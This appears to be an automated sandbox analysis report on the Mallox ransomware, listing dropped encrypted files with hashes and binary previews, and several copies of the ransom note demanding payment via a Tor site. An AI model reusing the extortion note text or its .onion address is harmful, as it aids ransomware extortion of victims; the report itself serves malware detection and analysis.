                    MD5:D0412DE7BD3E959EF927A296618FE759
                    SHA1:97F94A0BF2643153D7D7C54B2F7857432C349534
                    SHA-256:A53A2F0C39ECE6508E3F2772CF828D3DA3F1776F43E86114B2C700694F88D7BC
                    SHA-512:47D8CF0CB208FF13FCEAF32F7859853EACB38C8B2DFB164295B8AC1455602419EB3BBF785173AB931BFC06100808F858135966F5A348B26BCE206F8D89FD41FF
                    Malicious:true
                    Preview:.@..,I...},}Z.FKD.`....6[.k..A.^..........J.su@&d......i.r.e..3..d..z...9].0.S.z..gN...l.l.x..o.@..9...j.{i.W{I.;...0s.Z..}.B.....+O.._d...8...e...Uo%..1D....*g.&........p......%.AtI..._..xg...t....K..3.u.0Q%DEA.Au'..l...\.$5(...+.C/..(...eI.@.u....S...`.=O;s.4[.s.w.N..N.....`..r..]...$...6.i3.g....MYm..m$.}^.JN..w'..Tr^X6.....l.=.2....C..T.beH..o......7......p...'...I.wKa][.T......O$3............U.....c..\ .....!S.Zr.i.3..R..X. ...sy..........".>.\.m.2..1~~...Q.}.B+.$....&.....k.U.S.`(<@P......=...c.Z.......>......^{{......C.w.+.#.K.Cv`.$.c.Ud.60eBQ.R..A....~Eh.......y..x........u.......U........&.n<.)9....Z..sf+.._..gza&.iy...:V......d.....@..|....w=........:..R.df-.....ugS....,..6.p.A..<r....s...6..{.f.=..|h.8.....L1.Az.....%.S.... n7h.B..lT.!U5...%`&.$..p....*oNO...v;..|q..a4ti.y{"....@;..y...fuE...hc.....\.R&..z.$>..I.4.....qy...LN..Oe.l........... ... ..N{...I.9.Jt..]..i.c8.B.}............. .,\.|w..T.|.p7.z"S...#yPE......{+Q.U...7.4X..1

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1901.hyb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):121501
                    Entropy (8bit):7.9983821858252435
                    Encrypted:true
                    SSDEEP:3072:B20dFjMMSFFP451U4gw2q1ocI17HrY/Zl:pdFw5FP8iSCzQBl
                    MD5:8BF048ED608632C5226F4B4114C75D3A
                    SHA1:68923F27320C4C8257FB6E22C6C67042AE240BD0
                    SHA-256:0C5B417A13FB7D8890C06679AC38E6E298FB264FE479348F0E0C0908DF7D9F7A
                    SHA-512:CC014F453A1405DE8D3164D62C82BED7ABD800112346CA4F51C0841D47B022A7BAB359819F266498893C3FA6D8BBD2093CB489E89B93FA8F13C6A302A59B0CCE
                    Malicious:true
                    Preview:...0.q...7..X..b..1.$.Ay.q.....}xM.,=.....^P......&.....7..Fz....Q...`..*..XbU.AQ...._......y..LI..j.k.ph.3Vs.%...+8.mj..e.9...5..p....&.Y 41..wM.+9......^.Z.W...xfC....Rb.$...C....O...2.S..qF.X).P......4.4G.*.>[o.`F.x....Y.......OpI..T.".+....9.Twj.lj2.b.5.....Y......c../\t/;.D............V.}.......@.....h@f........&n.E...-AI...'.7V%.....M...W...._5...ok~.S.e......j.m...L..Etp..S...j.5.>z......h.|Z.s..U|82-.<v..RJ..F.^.a. >...X..DM...hx.%...a... ...&...&30.1...$4...~.E.p..T#..3.K.Z....8)..<+.o.1?.......k.f.]..5-..v....^7%...H..YF.SfR#:h...S.OFy.8..~.H..M&.......jn.M.....!.....jN.@.T.>jlO(.....`.|..W.x.S......j..j.I3..L.....z.u.d..8=h*.\......v.`k1.C.].l.uVVl`C.G,..K......._....W....A.../...T....e.q.....L.#.d.@.W_.I.}.b..+~.T....,*..&.....i=.2.3..g:.x.Sk{.T.CLi...'M.%......q.*./.c..{..6..'#....%..;.C.G.Be.rs[....>..O.N.#.........9o|.J;.............-3[q...5ZM....2..8.8..g#..{.O..D.Y..6.......:S..eqE.|.e.v.I.. .+.B..Y..tW...:..{e4.f.....2

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1996.hyb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):120520
                    Entropy (8bit):7.998405783712546
                    Encrypted:true
                    SSDEEP:3072:Hs258DBfZFnp3+92nKgAyEu5w83LlxzjRMXc0dvNifN:M2uR7382nzrNnRxzdMdvY1
                    MD5:B6480022D8316A084065485737ACAA5A
                    SHA1:A99CA0378D6541C4CF6512FC075FA4E0ADAEDC08
                    SHA-256:1B2F8F0C4045F0F2593B0785F176343D1C2E9FCE79E591B3CAB144959EEA6820
                    SHA-512:311F0592EFB3A68364AA2ADC1D8D6E9F730DB70870B3691A422E1F9377B8B270AAA5AD49C1697E957B02C65AF352FC58BC063F8C9D7A8197E4414A2759F9A1E9
                    Malicious:true
                    Preview:......k}<.....:.QF.../..z..1.j.J.d..d..e..8.*,...v.w..&......]f.`....4...H.f.,..E.E.?..T..5.r.......SB..(......Y..U~..l.0.gQ-....~...._.K....u..]=#6...|{...T...p.....*.L.p../........Z..]...Z... .>@@X...$v8..?.&.g.K.4...........$..M..m6.._...B.i....2u...i.8d>..2&....l...a...H.;O......f.w3...c.F.R.5...W..2.I..H..E.+.:.@o.....#.=|...1.....[..w.!!...6.0u.Dm.|....,...*...]Ba......m..M3.=.5?..(...t....:...../.7....`ep^v......I."....Z....,8........R...,v...."~t.z..0^)..3....,U.4..e..A`m...._...).r..'....L.]5.l..).@Ou.K?.-.................X..&#FcUT.9..d.S.(z..lV.p...f.iqx7.|S)B.p.c.%h.......Y.e.'..t......>...w..~..8.".M.w..d+..;...I...Wy.)k.l..1l.^.F...$q......a...-X.F..T.g\......Q`..G..4...(.k%........9D......'Pg.G.~..,...h....:r|.o.:..O._...o..T:.D....<pl3..B.i..P...=.......3..Q%....c.......O.Y .fW...,...Y...0.Z5..tA$...e..).h.:....b!....G.OB.;....\Z'....\..Zp.,..!.....((...,.O6.^..%>.7..4*.N..B..S-z.~.'.i.\#....<".gC ....`.>..st.r=.;}.!.....

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-ch-1901.hyb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):120326
                    Entropy (8bit):7.998177744963771
                    Encrypted:true
                    SSDEEP:3072:bk2kUrlYWeiNuDYVIFD6SN1O9VJm4FakQjBsmfdNWgRTka18/W:bknUTJNuDkk71OVFaW+NWgt7
                    MD5:D850E88E9159B2184AD50F94BE52ECE8
                    SHA1:FE898043B428C6E0844BAAA0AE6A59B4BA3C0174
                    SHA-256:04491F4E541230E64E51BC6918566B49732845CBD9BB71BB59AD062EC4159617
                    SHA-512:5DB3D72F88CBDDC264ACE75BC05BCCDD315116465CA161B1762BFD18449334A98ADDBA6DFFADBFC38D804ED09688F1199496C68520DBD990AF8927AE1076802E
                    Malicious:true
                    Preview:J.J...jD..`.......X^...uf..Zng}2...e.s.......a..4b.....#...L..b.....K..^e.W......;..j<@Z.O+._d..r...}..H.....p.yN..]...h.Yj....).960..|1.@Z...{X_..=b.n..}..m.*$......wJ!......6.)...d7./.d.....2....h.....8.'`+Z.m@.(I....gi.....u.....E...?.'.E.5w.._-.....:0.z...~.rT.='."..s^.....t1HV....2..kl..ecF.'..#.......gK^......_l.;..;.....a4...B..=;.,..z..............z.G...V..~. ....ac.$.g#<..?.+c............ ..{.w...G+.=.!.M.'..t..;C...2..3a.....M..^..2.N.,...qBpqL.=.1)....U........^...Q.V.L..L..x.......;....H7.......6.<.....).........2I.;f..R..z...O....h.....k.5...z.....;`.V..!&KCj6.wA...s....M...]..j..=..,..{W....L.g:......@..jJ.`.!q_?.i.hG..ek.+PE....F..s..D.P.],..Jh..Y.6.y..J?.b+...oM....Y..>3.A.B......w....2.H+nJ./..R...:r..$.-.oX_z./.J.&..<....u.\C.Os...?....J.Q...........C]fSD74..B.F.0|..l..u....8.......HO.Q.vb...%U.0*...>I;.hn......`2.E..rx]..kcq.S.u...5......4Rp._.K.....V.x..d.].J......Fd..,.o........8..5L.5..B..)p.D...'E.>..-Z......

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-gb.hyb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):46715
                    Entropy (8bit):7.995994814602748
                    Encrypted:true
                    SSDEEP:768:XrN8eMZbfVJ2Ik7h96uJOyfDRgQNf5wWfFo9b2eV4CLeriHaGSU0RYoqSZfjH:bartJBI6uoy1guwXR2eV4/MaGSU0RYoh
                    MD5:5CE3F49ABC019C63AD01A5A849A0F56D
                    SHA1:AE873F4BD12FD80E952901230C2FAA794780578A
                    SHA-256:204FFDB6FA1F0374F1A6C135BC35602153E46C9B7715959B3EC95A3F6551BB6A
                    SHA-512:93F7A1CB1A670531ED1C70916BD2528E7067987C8D15A15B15743B21FD03796958951C78AE14AAF1A8822498E5454E59288F18EA43B925C13E44AD06365E0F8E
                    Malicious:true
                    Preview:b.a+,/.ve.....HD..-/zp..".]}.4n...*..X;!@Z.~.r.3...aA7...i.!.U1..S.K.8..*.)....]....;|.w.E.R..=...>3.~.=..7x.S....\@Eo....0.uV.,....3l..p..J.UM~.j@F...-..w.|......o...\5.;.m./...D..C..C.U8....!.d....F/.j>&...M.q..RYZq.......H.......4....vh...lu..E..#P<D.,?u-....$.R.0..sD.~r2*.Q+fF....&.....Ai..C.eFr.....*..)...w.V.,m...\:`B...|3.>.=..<*..`_..c..&G..5f.!..t.?C%....1x.C.?7.D0.N.C...8p.h.d.G..I.7.4.\.Ud.,.....s_.>......2.....z.c.#.t<;.L.D......4..X.....He..c'..N...g.&..'-.i...aJ...lv........L....t.o..Rsh..u.x....h...v.M6b.xAX.$...&.?.k.@.R.b....f.....J.(..Z|..P.;.b..9u{....#.N`M.....,.yC.k.O.S...o.)....e..m.._P.<Me.y.v.....)..)..{%..J.p...o.X.#.&...HB..._.#.).b..Z....5.Mo...rYA...UM.j."k.w...IY..6..}..jQf....C..%j......A..N.*je`.tc.eb...?..J~y..B..\....Q.XT.....F..`.y.s.........t.#.W|.........+.........1....r...Ii.B\Z$.b.,.....7gJ.1.F..$.O|............pQ......{...:....{.}4q..f....CB.......0Sr.U..I."~...../.8..p.....-Y...I.Z.B$..?|Kv......l.mjk

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-us.hyb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):59910
                    Entropy (8bit):7.9968741440060205
                    Encrypted:true
                    SSDEEP:1536:QR2j+7OJGbxy1aqHYEO1CyyX9LQa4C9uk/azr:p+KJGbxyrHYzC2Cok/u
                    MD5:16408B4C9A94882324AFA70E5206FE5E
                    SHA1:047049262112734344751DAE3DF612A545BFC8FE
                    SHA-256:F0F7C3763D26AC350108839A9A5D7A8E06CA4AD27CBDB4A0854DFFE9C45F1166
                    SHA-512:1433777DB8315FA3672ABF12FE465CE3A8A84439B59CDB92EBF474ED051054CB5525BC11BC9A0CB0E55CE0BA4515B9511AE55395A5D68195F23A00B83CD0B540
                    Malicious:true
                    Preview:.j...\X{.V(q.bI~!.\....\[....Z.@....&c....W...m.n.ZV....Y...o#.......W..._z..C.n....:..k..<.d...]Z..~h..O.t&Pq.)..G.j@..j>.LB.. .'......go.....p=..VYa}IB.;L.......I...e..).Ub.7.}#OpV-z...n`.,...-^n.9 y#..ld.,..+.Q......,.p,...:...I.A.../.[...}:}9.l.4/.sY.v.?...\..i_.T#K.X4...,xU.....A.@O....>.....o.%. [p...m.;+hb.<|.r|.<.HH....)..Lw..$...i.i.b....;..t...r...2..fB.....{JH........Ag....9..l6.5J..n.'h..0TY..4.nG...>.(..I.5.iK.0u*n........)p.....|.[.."#..J^.L"wW?.U`.cb...zZ..1v...P1.PW.SEX.......{.n..t.e....B..l*.2..1P5......J..$/.vM{....F.....o.h....J.p.3bC.w..+k.}U..;.{.BQ..6.=C.<..%.-.nt.>.k.)..T.MS..I..*..s.E.I.....&.....&.t\...P.0...g.a.^.?NT..=D.1..../....&.M...Zi.N....6...:x._W...=.........A...3.N...X.|.A@Y.........[....&H...ne..O.-e3.(R....>qB..{6..(&...|.....D.1sK....tL...J...y.,..u...v.<..)..p.X..[.Y@.[\...q7./....E[o....~Z.[.....O..0.H...S.G....1........../-o.........z!..Z.r.....qK..:;..<3.<.`=..1PKt.lwTh.tnA.[..J.C.+....Y...

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-es.hyb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):15103
                    Entropy (8bit):7.990148072117861
                    Encrypted:true
                    SSDEEP:384:s/B/xbxJbqmVTQgxBQ9fLUPLo1nwT0HAuuV6y:s/TXPhA9TUEtFHIn
                    MD5:0C027E87E7CE2AD7325A52395AA99531
                    SHA1:93BC9AF48FA6C193D67A2D312D653F0670089C75
                    SHA-256:368ADE1960AD728A99B412D210EB4B73E7733D1894338F54A078929F1D85926D
                    SHA-512:22B03479E8DD9464185BD4D05077B3385476AE0C2C2362254DFDFFD4754DCA9E4E59CF11C075FED58F94AA183E72D867AF33B305BDC4759EB4EFA3F4B952B031
                    Malicious:true
                    Preview:..k.+..gA......#"..SQ.@.p.-..D.R.o..4...h..f{...U..;..;}.g?b.j..v..bR.u.I.".4&..A.a6...8."...Kc..,.y.d.x{...(.....F...........jz......j.O..,j.....l..6+&.M...\(.5...t.mx....`.b..#.,...<........\...{.W..w.+...5hYv..*.0X.)L.2(.O. w.f.{.zj7.g._.../N1. <.......v.Z.Eu.N...a.X#........5..!.k.+..R'7P-e.....rU.P.]....1..q..0F..`..y....n...r....~..P. %..t.$..........%`..g".V..+...c.%....|..=]...r.?..pt.Z(..8.....V./p....g|B2...*.H7.#.. .@Y....%.@#B............?.2..j.^...:ZJ.,......r......W..L..,.4.e..6.U.....}O..4..d+f."..8.m...9.x+...Y..D;...A....(6....:p..1h..(.........!..J.....M....t.3...=_..;A....5..8..,O1...M4...ZQ...c..d..)...gn...U..=g.......(.j.=.c..r..KZ.1.... by5.........ffeXO.J.cI....b....7*...<.ZA.g........\"..gI3....X(.h7jF......eX..m.:m$...o...H...j./.....3^.N..A...Q.".W..k-.w..w..Y..#..1.u.....Y...0N]d=.....Z..j2...T..=.Q#.\.b..BZg.@._.(...[.q@%+...3...I$d.A....O.k.s.6..rU7..m2.b......2...&[......|F...F./f...........Y...v{....t

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-et.hyb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):21529
                    Entropy (8bit):7.990558449658917
                    Encrypted:true
                    SSDEEP:384:ENpT1yfl3El25SmJiEjRjULwfssgP79YQWaPM1nsxA/BrVP6FsT1NN0FG3n2hszf:0p5+9Lws0hJBR4nxZrFuSfNluGf
                    MD5:E9B6F452C78E2433D898EA86C262556D
                    SHA1:3A9F22EA357B5DB9F28CD74965174530EE4EBF0A
                    SHA-256:4DFBB2552AAD12A1E8A24BE2B2A29FE41CFFEDF2FA66E319250BE4B8C0AD2D8A
                    SHA-512:8AD51E281D5E26320FD685C2F8DBBA2F31E3666A3335F3A3B8E6F067CFD8216C34F86E8F4F215E88D79401560A13386EDB5A21742F73C6D71D17563BEDE47325
                    Malicious:true
                    Preview:ig.....J.Y.(..%T.Yo......'.YR.~k!..!.?%.q. ..(.\QI..5...E._Q....^..G...X>...q.p.Ts.\.G....:IN...?.l.N...}k...p.....<...S...&.U.3+Iu.b.p.3..[.]Aq..gG.u..j...R.&d...!..L.....&...M\pjZ/..K.}.^.B;.[.H.W.7...E..`..Myc.....)..m....D.......^..nZ..C.$.....k.-.v.Hl.=.<z.w...i5o......C.G..Y.k...0t. ..Ihm4....L.Q.KF......G..C.....Pw.F..Y......K.2W......~....TcE_......p.l.p..N.i.FP.)....}wXPt.$K....x.`.G.....Itq.<...,J/[..Zx....G.XY..3.vy.`........{.&<O...L3......Y}/...ghK..J..rc?5c..%9..;r..C..k..l9..@.[r.e?..u.+..b'.,0.......(,..........o...}..S....|q....@;..Vt.....(/.f':................5...?.....v.6.....p........M.q.^..?0...M.......n.<y!;...O..S...'K1.U.,.N:0k..Z.2....SE.....KBf.5 ...&D...l......f_q].w6OX..h...VOO......i.Yu...hL...>.\:./.@Z..aIae[.F.........l;.#..~.$9..|....f...f.~.J'....`R.]..I.......e.?;`_.`.J.j...v.@..Y..m......:A..z......I. .3S..7f.,{./.y...#Y73.......l.J...@_7.....6}..0.i..]..m.(-...a.p....o.c.R.....r...7o|..-4!4|w..#U....

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-ga.hyb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):35932
                    Entropy (8bit):7.994906811715129
                    Encrypted:true
                    SSDEEP:768:PMQkj1uYIjIe5FxsYMOUQHKBSOSpSCfIMj4PsGqaSZ0b:PlkJuYIjIe5F2pxSn54Pw0b
                    MD5:75FC88691A21F2B2973B604778B82423
                    SHA1:E3626D8F460FC90F1AB86A2AF812EA7CF7899639
                    SHA-256:0B7743B92F7D11C82374EF008014D7E780FCB47B25EEB79CBC5886F971CF5441
                    SHA-512:C8C6DE447BC922AA5D4085B2F631850DA58428C405DA2969CA6E447ECA571EA4C9DE7A39A5EE17E12AA573A5255C8044D87E51C12D8E03B1F99BA746F5D55157
                    Malicious:true
                    Preview:...x.DI.W..R.s.`..HJ@|........{..Eh.8..u.wn..8.P.z.f.............vP.D..e..*(.R.-...Uf.[U..:{.........&@..G..f..kc...~..Y..;Cg.*...sBC..!.......^..WI..*..,..%...Zdl..V9Q...[.9o..H.....T.u.v..$.>.`....z\?.r.S..1.[..nR...y...>.Y/z.S.=..@f..-..m....>5...:&.. ..x.Ms.Jn....I.$%.*)$.eP..0..{.E6S|HT.S..yV5G.K.3}^.&o.u.\.SME..O...H.6.~...$:......>Ng.ALx.M{.}...`O..)...q.R...._.o+......<#....nO5...........+UF....>"}o..%.EK.s.8.)6.bvRk.Z...9..n.dhkh..G..D.b.z.~......c.mL.O...Yv...e.(.n.s....C..Bb.Dmk..2{.....toB%.?..4 0....@..c.;r..+...a=.......yt\..,K..97.s...MT7Id...R......... .<.."..4........I>?...7'l..g.e........c..^.w.zg1bHl.A...^..4.K.8..r'......\OF..K.c.....&V.........Tr.h....~s..J_...k...s`...._egu2.'../TR..C.....h..c.....*.s.v.OG..+".Od...C:5...K..,E.4...GD.S.x.}..3c...{.H...k.j....#.|?.>.-<.D.....4.....g.mtW.J..V..e...:$...?.g.|....o=..#.......*.V].P..5..@.q.}...._..]...Y.0..W.GZ..k.}....`Od.I....}w.x}b......U.Z.[.....1xFf..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-hu.hyb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):317359
                    Entropy (8bit):7.999471929492412
                    Encrypted:true
                    SSDEEP:6144:ezgUGethRG3gDTHafkuLka9sUQPej3sLHhCZ+4gs558pi71hGMcF:NeJ2gPHaMu42j3uUU4gs5qp0/w
                    MD5:238D775ABC4426C96044FBAC26C13C34
                    SHA1:7E5AE67627EB09BAB7479DFF01F3978DA1848285
                    SHA-256:919C47EBA21B714FC75A0F9281D8F313ABE2C13BBFD56F0866E301AF24FD9798
                    SHA-512:5B1E21D6AC5CD1C78CED110F193B7AE89429AC1820E4E3E445DA0C7EE72AE5E4FCF3E1616D01D090EC7B1C864809E637E23338611FBF55BBC9C9A7C3BEF5ABA4
                    Malicious:true
                    Preview:...Tq6.......I.8pj....DH|.2.............d5.`..X..%.+/g..U.W....p..W%w.p..R...sbL.j.y..+..T..K.+....Z.q.?..c...N..)...*x0C.s...!V {...E...? J.,W,..L..-.K.8.uf.....@.a..}UjR_.......@@...W.?!..)_....8..6.xG..o".p.f.. *..0o.r..l..'...cHT.9.Ea....u.5..(,...;...}]u....W....#.....Y.)...=Zk..1......O..,g.......n..j.....k,2....}.....q....,A..o".k.L.B..x..eU:..q....Q...;....M..HH..6...(w7.434.#.y.n..x..-.....\?i........Q........z..6....n.E....y..............u.g.q..ML..jQ...~.[...N...Ze..rg.9...c:.....:e|..Qd.K.s....v....Z.PS.{.U....t..A.8`...<...o...{}..!M.-. G...3....``0f...i....k.....e.5~.V..t.5zb.:Q.E....aqB.`.c...@EC:Nk.l.\..U...G..`)N.L<).Xq.R6?..[.K^a..,..(..O...V..u.z{.......)7.H..'....c0....*.-.5.`.....sn\......C..<..(H`ur>J.'.......Jn#>..(..q.E.7tn..1..$-+........Q.1~VK..>...x.[..H.K.s.e......H.g.].b..D..j...K(Z....../...........J..N.../.E...Nzx.a....N.ER...Q.\1<..c:T*^.....;.`X{..Q..5g`.;@.m.6@a6R.....7.t.Q...H...4...ky.h..c...k....

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nb.hyb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):145371
                    Entropy (8bit):7.998823731009282
                    Encrypted:true
                    SSDEEP:3072:8p6yb0lrCS6k74NaYYgUFhDlW4h1fHekLOPMYGFRxYrbu+Z:8IycC5gg0DlW4DfCPMtjYrbF
                    MD5:F44631EFE4636FC3F7EF3C0BA3496E5C
                    SHA1:F6B29C9277CA0C1071AFD9081651EF78D7B43A30
                    SHA-256:3B8AAED66BFBD58F2BD5922A49B72429C390DB06335BE461317136D2497E6993
                    SHA-512:3E6D538936246C5657A486EAF439396849D3F219E33B81D923CF078CCDAE23C774473B2F0DD6E6BBF6244AEF0B3372BAA696C58E564F3D7945D1F6BF155895BA
                    Malicious:true
                    Preview:Yr_G.+~.!}&...".d.(......}.>.+5..q.8[.%@.8.o....m...h.,...z;..}......8'.B.N~........GcP.o......V.4.....R..f.....(:(x>\.5..cO:...bu...v.9...K..Hs.L.E....O.........agC...t.9.A..#...Y.K..ei'...a=.j ......9.0.......V..L....4.........m.B.....#v....!O.P<....d..R....b....4.].wq..nn...&.....Q'.J......@.....T^...#.Y10@.../8;...`$oM`.Y0&...7.KC.a.?>.....-i.Rp...ZN.....1.m..T...8...L.U.....T.}~..n..bV..r...Ow"/.....4l....8.....h..I..B_^...B...x..8-..!tX].b.T.."...|..D.2.NP..A.O.=..stzu....W.}..?.Pg....@.....v.9R=.Q.l.i..._...7..T.Z.'W....lK...5..$W/..:X...i..b....^(.....u.....M..7Ga..9Gt.....B.<....)e.b8CHs,.".h.(.F!.}....8i...m..#M.........J.(v.P..{..6.......e.$.A.:...V..#l"$..G.*..~<R/M.|...n@.^.S.......).KE.YzF.O.O.....aW..}../h......,=.jMZf.,..%...;.!.[%...M...x<....2.h...i.o)x\...E3.C^C.....0(...x....v..z..XW..}...m.g..`<I..~..3X....a<.Z.%..>&..!...3.|.....#.t.5...ZCJ9.ao........ex...?.I....b2......wtRs.........t ..-...b..rX.=....4;B....

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nn.hyb

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):145371
                    Entropy (8bit):7.9988636681607055
                    Encrypted:true
                    SSDEEP:3072:g5U5ANNfTy+UxIWPYhLkFnQCVX7b8jHfxTMM1BY2sJ/UMO:v6AvxBwujX30B1BYUMO
                    MD5:8024D959A68D08121246BBEA22AA27C0
                    SHA1:2FC965EFAC20FE50FDD06C0220E95CBD8979D9BD
                    SHA-256:5C259AB9654087F86B951302343ADEB4311EA9F8B5E9A2CAE7ED62BE46BBD6C4
                    SHA-512:BCC634BA62639704EDA4E36A7800776DEC0E000790DD0A7E920C47F30CF21B865E2365227FAE526D2954844B26297B270AED29CC01EADEDC0A6962359D244BF0
                    Malicious:true
                    Preview:Q......}.r{.......Gq...5.^...Kh9...@.......e.R.(...`*h....oB5ow...Lq.x:.] ...;J!)V.dK...l.In.{.YS....{...ew|.B6B]B!..*.a..S..W.....[.I.3.......8.....Ky.3D~...|s......Ef........|....?R....v...S.n...{%a........`".............fi..uM;........O.......S:.-b..U3...<...:Ve.K0.*..eV.u..'.e..tc..k..K....M......nzdo...hS...EJ&.J....$X%...C.*nc...'..P...q3g..[K"...5...J..h.H...#.. .].?t.lha....}.{..n.Yi,.^w?..-..~.Lz....?..2.<.}...z....=.....*c.#%.............g.....&..\8..>1..PN.....H...Hm..G.H.[ j1T......d.)p....A..j.....hg4..>x.O.v..)rJ....7..Wu.5[..O.W....%....;..... ...u:E.0|.np...Wk.m.p..N.......q....+{..v.q..........IoH @#....9..xD.m.Q*j..F..td.[.....)^.....8.M+...a.N;....^.w...=5X...67Aa.g...........KY.h.T{.Q...o.a.b.,..4.h.Q.O......JN......KWd...~T..s..d._..[a.>..}..y..i..{Y_i,.A....#..13@(HOF;jex....c.`.s..T..<kT,Y.........b.........x#.X...q.s.....(..Y.y...+N(..uJ.z......N<.a...3]..(..k.K.j.L...G.0.<...u.....@......;...a.`...V..f5......R...{.j:

                    C:\Users\user\AppData\Local\Microsoft\Feeds Cache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Feeds\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
